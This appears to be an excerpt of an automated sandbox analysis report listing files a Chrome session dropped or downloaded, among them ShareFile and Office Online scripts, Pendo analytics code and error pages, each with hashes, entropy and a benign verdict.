                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmModal=e.confirmModal,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess,r.warningConfirmModal=e.warningConfirmModal},function(e){n.createElement=e.createElement,n["default"]=e["default"]},function(e){o.useHistory=e.useHistory}],execute:function(){e((()=>{var e={9669:(e,t,r)=>{e.exports=r(1609)},5448:(e,t,r)=>{"use strict";var n=r(4867),o=r(6026),i=r(4372),s=r(5327),a=r(4097),u=r(4109),c=r(7985),l=r(7874),f=r(2648),d=r(644),p=r(205);e.exports=function(e){return new Promise((function(t,r){var h,g=e.data,m=e.headers,v=e.responseType;function y(){e.cancelToken&&e.cancelToken.unsubscribe(h),e.signal&&e.signal.removeEventListener("abort",h)}n.isFormData(g)&&n.isStandardBrowserEnv()&&delete m["Content-Type"];var b=new XMLHttpRequest;if
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65479)
                                                                    Category:dropped
                                                                    Size (bytes):98732
                                                                    Entropy (8bit):5.344399340470534
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CDCA5117242386D7CABB8C5CDEE3F9A1
                                                                    SHA1:E79CED8986A52C729CBBD2C876D0DC25C0FFD33D
                                                                    SHA-256:579901D2E27F2ED03F94DE3602CF3A15EDB7C307E6D0E325E663A8A75C81B036
                                                                    SHA-512:961A123E53AFFD196AF2F61AFF83A72DCC7EE36B98680ABB1EEE796FBE1409EC767B5E49652D9663EA10BF6C59EDB7A1B16E79CDB2D4D6A3F0E0337FE40D8666
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountFeatures=e.AccountFeatures,n.Api=e.Api,n.BillingEntity=e.BillingEntity,n.CountriesEntity=e.CountriesEntity,n.CurrencyCode=e.CurrencyCode,n.PaymentAuthorizationEntity=e.PaymentAuthorizationEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.InputNumber=e.InputNumber,i.Layout=e.Layout,i.Modal=e.Modal,i.Radio=e.Radio,i.Row=e.Row,i.Segmented=e.Segmented,i.Select=e.Select,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Table=e.Table,i.Tag=e.T
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61276), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):795817
                                                                    Entropy (8bit):5.678759319464712
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1EF237D0B6617D5D9E82D98839B65753
                                                                    SHA1:02560680FCAF4E0465D229D2E2A46F3D81C834BD
                                                                    SHA-256:5EB2E4375E3E1625F20F5E12F9CF0DDCC854166BB54F942D2F47003D86747AFC
                                                                    SHA-512:B6D2EEE2E64F4F7752E91EB0BDA3A81550D685EDA4565F36580FF47D08450583A043BA1E7E015629D4ADF77BCB2DE8A695695025716FC0E51BEE76C33A6D8835
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={1757:(e,t,n)=>{"use strict";n.d(t,{F2:()=>u,ST:()=>s,UB:()=>c,lU:()=>l,pq:()=>a});var r=n(1413),o=n(8211);function a(e,t){if(f()&&d(e)){var n=i();window.__citrixui_internal__=(0,r.Z)((0,r.Z)((0,r.Z)({},n),t),{},{instanceSymbol:e})}}function i(){if(f())return window.__citrixui_internal__}function l(){var e,t=i();return null!==(e=null==t?void 0:t.configuration)&&void 0!==e?e:o.O}function c(){var e,t=i();return null!==(e=null==t?void 0:t.onNotification)&&void 0!==e?e:h}function s(){var e,t=i();return null!==(e=null==t?void 0:t.showModal)&&void 0!==e?e:p}function u(e){f()&&d(e)&&delete window.__citrixui_
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):274402
                                                                    Entropy (8bit):5.208433765614
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C4A67CF532C9F84838D136729C616A82
                                                                    SHA1:FA77707396F15A7F28435B372C422A8F36FA78E6
                                                                    SHA-256:B8DAED3244D3575D23B6C7945D42035E42996F5BAA469C910ED3522E5532C21E
                                                                    SHA-512:29053A3B78A01E1DE3E99093C0C4466E73CB96E5DFB7E72B7DFE2F060F65CDAAFB36C07E4AA3C6B712DE2EBC74DEEFB0B37154A5FB97A2DA4CD70C6395F5E6ED
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/b8daed3244d3575d/wordviewer.css
                                                                    Preview:.headBrand {. cursor: default;. line-height: 48px;. font-size: 22px;. margin-left: 20px;. margin-right: 20px;. font-family: 'SegoeUI-SemiLight-final', 'Segoe UI SemiLight', 'Segoe UI WPC Semilight', 'Segoe UI', Segoe, Tahoma, Helvetica, Arial, sans-serif;.}..cui-topBar1-transistionalHeaderUI .headBrand {. width: auto !important;. height: 24px !important;. line-height: normal !important;. padding-bottom: 12px;. padding-top: 12px;. display: inline-block;. font-size: 17px;. font-family: inherit;. margin-left: 17px;. margin-right: 17px;. font-family: 'Segoe UI', 'Segoe UI Web', Arial, Verdana, sans-serif;.}..cui-topBar1-transitionalReactHeaderUI .headBrand {. width: auto !important;. line-height: 48px !important;. padding: 0 6px;. display: inline-block;. font-size: 16px;. font-weight: 600;. font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.}.@font-face {. font-family: "Segoe
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65472)
                                                                    Category:downloaded
                                                                    Size (bytes):124348
                                                                    Entropy (8bit):5.387345535709884
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:26AE969AE1CB4DE6E8543BB7BB8E7536
                                                                    SHA1:8226A49E5C3F22CF1814FC0102455303FA4145F4
                                                                    SHA-256:5EBA6B42BBD6AD27708CD3B474B349932ACE3CAE9B035EEE8727E1ED2BE46218
                                                                    SHA-512:F28CD0CDA8F7244E94DAF3701D4C11EF98C8E1EAC12B7E804295AAEFB07315190713BA46B843F516A110A4A2762036263A9474A328A7AC7FDDCCFCE6D45825B9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.24/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n.isNote=e.isNote,n.isRequestListBundle=e.isRequestListBundle,n.isSymbolicLink=e.isSymbolicLink,n.isWorkflowBundle=e.isWorkflowBundle},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Empty=e.Empty,o.Flex=e.Flex
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (22063), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):22064
                                                                    Entropy (8bit):4.8654655187166815
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D2702DCFED567BCA070F8FC55EE3BBE6
                                                                    SHA1:13B0C79DBD613889BDD32D6234DAE9CAEAA3CE8C
                                                                    SHA-256:B530C482126F2B86447E3A7E6F9319C8FCCD071659A3BAF914E8C51589AEF220
                                                                    SHA-512:8EEF7953E5B4623BEB6A423CB05D675E881D6B761EB5B5B7A4DCE0778B5F016452F37F907EE401D7E291204980AA521EB6E58C6D17D9ED81B7B2A66AC0E2F6AC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:{"props":{"id":"pendo-base","data-layout":"tooltipBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-0978f7b0:hover","styles":{"color":"#D9D7D7"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]::placeholder","styles":{"color":"#999999FF"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]:focus","styles":{"outline":"none","box-shadow":"#00000080 0px 0px 2px 0px"}},{"selector":"#pendo-button-bca5c491:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"#pendo-button-799bec88:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #FFFFFF","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"div[tabindex=-1]:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-XNJ1F6ATudKnb82a7viL5T2TM6g","data-vertical-alignment":"Relative to Element","data-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):1374113
                                                                    Entropy (8bit):5.507814572393474
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AB35719477857B426C46D570BD5F1D22
                                                                    SHA1:A3E58EB96CE4B6186E9CAA47EC0D558EFA1544EB
                                                                    SHA-256:772D49A96F92F9F32F0F821BFD83C3BC7D73C57C7A26B85F4EBF4B17134E2FA7
                                                                    SHA-512:7538BBC9733D5F5938DD6BC04D307F548D0D474CF6CDD8FE1BAAAECACD1F83A82D71509D561175501EBFA3F1834D8C490D7476FB4BDDC196A39B155C82A8C3F8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/772d49a96f92f9f3/uislice20.min.js
                                                                    Preview:(globalThis.wordOnlineChunks=globalThis.wordOnlineChunks||[]).push([[53227],{2977:function(e){function t(e,t,o,n){var i,r=null==(i=n)||"number"==typeof i||"boolean"==typeof i?n:o(n),a=t.get(r);return void 0===a&&(a=e.call(this,n),t.set(r,a)),a}function o(e,t,o){var n=Array.prototype.slice.call(arguments,3),i=o(n),r=t.get(i);return void 0===r&&(r=e.apply(this,n),t.set(i,r)),r}function n(e,t,o,n,i){return o.bind(t,e,n,i)}function i(e,i){return n(e,this,1===e.length?t:o,i.cache.create(),i.serializer)}function r(){return JSON.stringify(arguments)}function a(){this.cache=Object.create(null)}a.prototype.has=function(e){return e in this.cache},a.prototype.get=function(e){return this.cache[e]},a.prototype.set=function(e,t){this.cache[e]=t};var s={create:function(){return new a}};e.exports=function(e,t){var o=t&&t.cache?t.cache:s,n=t&&t.serializer?t.serializer:r;return(t&&t.strategy?t.strategy:i)(e,{cache:o,serializer:n})},e.exports.strategies={variadic:function(e,t){return n(e,this,o,t.cache.c
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):273394
                                                                    Entropy (8bit):5.704009797803673
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:34586C6D677B1A9F28B600177A609374
                                                                    SHA1:3503CF84F4B574B6A9BF6CBFC742835302E8F5DA
                                                                    SHA-256:C8D8DD26AE2F947BD55165FBEE88336D9D4AE3C0B8C3B3F0D22C29D580916C4C
                                                                    SHA-512:1C1BED897C9B750254E05FF65C5DA708E7B9DCE58474061990A3A3DA949258DF74018BE69031296A8CEB521DA73C998EB5712A76F2E3781606C61065DF698515
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/versioned/suiteux-shell/4.0.73/js/suiteux.shell.core.js
                                                                    Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={61448:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},2403:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                    Category:dropped
                                                                    Size (bytes):24
                                                                    Entropy (8bit):2.459147917027245
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:GIF89a.......,..........
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65479)
                                                                    Category:downloaded
                                                                    Size (bytes):167498
                                                                    Entropy (8bit):5.295825538533868
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B361E6F00E5D233C4F46804CD995FC9B
                                                                    SHA1:37F5C9DE386493D2A3FC9C7344803158C249F249
                                                                    SHA-256:FC9AC1D6DF5012BD5356A8A1386ED390B1BA2B83EB19917B2F2F78C934C9F836
                                                                    SHA-512:64990BFF09AA2136B0C5CF4E9835188CC6A1076F27BE62F4CB6493E9725890D4696C97B0E55D032784586570CCB20B4B641D55199CB2F48E2EC7E7687F9BF9DB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.10/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.UserRole=e.UserRole},function(e){r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Carousel=e.Carousel,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Menu=e.Menu,i.Modal=e.Modal,i.Popconfirm=e.Popconfirm,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){s.createPortal=e.createPort
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65477)
                                                                    Category:dropped
                                                                    Size (bytes):692334
                                                                    Entropy (8bit):5.968709830324238
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:067CF2A6D1217DEE68956618F39EFF41
                                                                    SHA1:3020FC701466FD2EEF58106F06E9EA3F8DC73E84
                                                                    SHA-256:1DCA75C3AAF98250049CC493816195019C0BEB53FB1C33EA9B4EF2D7F303E015
                                                                    SHA-512:949A634645DFC253A6151970ECFA91411BD8449C95597A02E647EBD4E0AAE1D12D5650CCFAF9693913AF2C7ACE0E365B0E7071D81ADC476FE8EDAB963FF18560
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},s={},i={},o={},l={},u={};return Object.defineProperty(s,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Card=e.Card,a.Checkbox=e.Checkbox,a.Col=e.Col,a.Collapse=e.Collapse,a.Divider=e.Divider,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Layout=e.Layout,a.List=e.List,a.Menu=e.Menu,a.Modal=e.Modal,a.Result=e.Result,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65473)
                                                                    Category:downloaded
                                                                    Size (bytes):463080
                                                                    Entropy (8bit):5.533233539796553
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B669FA5B3249D0AE5F66B5E7B4525D83
                                                                    SHA1:064367AF4ABE4A4EFEBFD102F9AA445ECEAAA697
                                                                    SHA-256:8228D3A449A0C3525C9B8986F640CDEE19158E869D31CD17CCF222FDECB0CECC
                                                                    SHA-512:E4208D1BA157C17A67A1C04766BC71B84AD96A733ED17198E37D5C4BEF0A5EA00A0804AEFA765EB1367C39141CC04AFC93498B69842A03BFB3281393A11460B2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.14.0/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={},c={};return{setters:[function(e){n.UsersEntity=e.UsersEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.Avatar=e.Avatar,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Dropdown=e.Dropdown,i.Popover=e.Popover,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Switch=e.Switch,i.Typography=e.Typography,i.notification=e.notification},function(e){a.Children=e.Children,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useCallback=e.useCallback,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useReducer=e.useReducer,a.useRef=e.useRef,a.useState=e.useStat
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):21
                                                                    Entropy (8bit):3.594465636961452
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                    SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                    SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                    SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:{"ip":"8.46.123.189"}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1208
                                                                    Entropy (8bit):5.4647615085670616
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D29FA9F2AB3A72F2608E8E82C8C3D1C6
                                                                    SHA1:8B21CC06752837B4B6B8FEF8D54F50EB2C7CCA8F
                                                                    SHA-256:E1B0A10649C4B92F828523EFC2EBE135EA9488179A2816888D1E84F786202DBF
                                                                    SHA-512:824A207E3F5AF4934B7B50FE5E3F8585FAECA571C3C39E510C06DC8FBDF3E64B07811CAAE06239936BDDDDFA4C90E534F03C0DA8147AF9294042DEA6B0FBCB94
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>500 - Internal server error.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (358)
                                                                    Category:downloaded
                                                                    Size (bytes):11816
                                                                    Entropy (8bit):5.037139572888145
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A8063BD37D3C8FB3176A6BF140558A4D
                                                                    SHA1:E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
                                                                    SHA-256:BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
                                                                    SHA-512:82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://victoryacademytc.com/favicon.ico
                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65310)
                                                                    Category:downloaded
                                                                    Size (bytes):519504
                                                                    Entropy (8bit):5.332571914574692
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:02DB7F1999C6CC2390C4532B71AE3231
                                                                    SHA1:F4243A03809A6BCA86A78505D636960552B1B577
                                                                    SHA-256:AA3B614CD2C516A214FCD9C9681381B15D03B0AE71C23DD4D2183C922FA27FC1
                                                                    SHA-512:359E4812DBCC9703B69AFC95A2E703EF9B0524BDF1DDA0B48E0E836F6A2244746596001A3FB4535D640CAD7323CEF19C9CE70AB5C1E1F7F0B8B7FF323458434B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js
                                                                    Preview:// Pendo Agent Wrapper.// Copyright 2024 Pendo.io, Inc..// Environment: production.// Agent Version: 2.258.1.// Installed: 2024-12-16T06:13:02Z.(function (PendoConfig) {./*.@license https://agent.pendo.io/licenses.*/.!function(ww,Iw,Sw){!function(){var T=Array.prototype.slice;try{T.call(Iw.documentElement)}catch(Ut){Array.prototype.slice=function(e,t){if(t=void 0!==t?t:this.length,"[object Array]"===Object.prototype.toString.call(this))return T.call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")});var A=function(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".split("");return{uint8ToBase64:function(e){var t,n,i,r=e.length%3,o="";for(t=0,i=e.length-r;t<i;t+=3)n=(e[t]<<16)+(e[t+1]<<8)+e[t+2]
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (53925)
                                                                    Category:downloaded
                                                                    Size (bytes):80657
                                                                    Entropy (8bit):5.013109282355643
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3EFBAE3E8929430A8D33717801E9C89C
                                                                    SHA1:82D05FE3B9D03DEC0081932CE98B0BB8D2D14520
                                                                    SHA-256:5764E77F219A80CB4F8C1462A3004FF53CAA334A7B2AB30D956F211C3292006F
                                                                    SHA-512:93400A8CCD8FE40456C93530C822F6C672EBE9062A4D301FC66F67C03FAC5D426ED74A355A1709C0F1FEA15A0214D07384EA8005720C40B21F7D26B98D9D48B5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.45.0/package/dist/main.css
